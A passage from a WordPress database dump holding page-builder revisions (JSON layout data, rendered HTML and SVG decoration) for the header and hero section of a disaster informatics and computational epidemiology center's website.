<!---->\n <!---->\n <div class=\"\">\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 15:42:03','2022-02-16 15:42:03','',20,'https://gsudice.dataconn.net/?p=309',0,'revision','',0),(310,1,'2022-02-16 15:42:03','2022-02-16 15:42:03','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>© 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics & Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment & Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 15:42:03','2022-02-16 15:42:03','',23,'https://gsudice.dataconn.net/?p=310',0,'revision','',0),(311,1,'2022-02-16 15:42:03','2022-02-16 15:42:03','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n <!---->\n <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n <!---->\n <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <div data-nav-normal=\"\">\n <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n <!---->\n <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n <div class=\"icon-container h-hamburger-icon\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n <!---->\n <div class=\"offscreen-header h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"offscreen-content\">\n <!---->\n <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n </div>\n </div>\n <div class=\"offscreen-footer h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>© 2022</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n <div class=\"background-wrapper\">\n <div class=\"background-layer background-layer-media-container-lg\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(196, 182, 182); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container-md\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(196, 182, 182); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(196, 182, 182); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n </div>\n <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n <path 